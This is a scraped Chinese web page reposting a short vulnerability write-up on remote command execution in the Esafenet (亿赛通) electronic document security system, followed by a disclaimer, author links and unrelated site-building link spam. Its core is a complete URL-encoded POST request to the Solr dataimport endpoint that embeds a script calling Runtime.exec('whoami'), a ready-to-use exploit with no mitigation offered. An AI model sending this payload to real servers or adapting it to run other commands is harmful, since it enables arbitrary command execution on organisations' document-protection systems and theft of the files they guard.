当前位置: 首页 > news >正文

好网站建设公司业务网站建设商虎小程序

好网站建设公司业务,网站建设商虎小程序,wordpress cd,找谁做网站比较好人这一生,不是看你贫穷和富有,而是看你都做了些啥。 漏洞描述 亿赛通电子文档安全管理系统存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令 漏洞复现: 访问url: 构造payload请求 POST /solr/flow/d…

人这一生,不是看你贫穷和富有,而是看你都做了些啥。

漏洞描述

亿赛通电子文档安全管理系统存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令

漏洞复现:

访问url:
构造payload请求

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1<?xml version="1.0" encoding="UTF-8"?><RDF><item/></RDF>

漏洞证明:
在这里插入图片描述
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社区:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
http://www.yayakq.cn/news/802299/

相关文章:

  • 建筑做地图分析的网站惠州地区网站建设公司
  • 政协网站建设情况汇报wordpress 密码失败
  • 网站网页建设实训心得体会听书网页设计教程
  • 网站建设分享邢台网站推广多少钱
  • 莆田做网站公司自己的网站打不开了
  • 网站域名怎么用周至做网站的公司
  • 长沙flash网站制作怎么查网站的空间商
  • 网站设计全包台州网站制作开发
  • 东莞哪里的网站建设效果好门户网站建设 报价
  • 大连手机自适应网站制作费用深圳住建厅官方网站
  • indesign做网站网页微信客户端手机版
  • 网站简繁转换互联网营销课程体系
  • iis 网站启动不了网站建设的利润率多少
  • 专业企业建站系统服务网站建设排行
  • 外包网站建设合肥专业网站建设公司哪家好
  • 没有ipc备案的网站建设工程挂网是在那个网站
  • icp网站建设wordpress排行榜插件
  • 中企动力官网网站wordpress编辑器视频教程
  • 多语言网站 自助深圳做网站推广公司
  • 四川省建设规划局官方网站郑州小程序开发多少钱
  • 做企业网站做网站建设公司怎么样
  • 网站管理助手未找到iis医疗网站建设哪家好
  • wordpress顶部图像修改如何优化网络连接
  • 做网站最贵wordpress怎么删除
  • 深圳网站建设自己人宁德古田建设局网站
  • 杭州门户网站有哪些wordpress插件微信
  • 佛山营销型建设网站浏览器主页网址大全
  • 郑州网站建设 李浩番禺网站建设专家
  • 网站建设市场规模电影网站建设
  • 网站关键词代码网站建设教程pdf百度云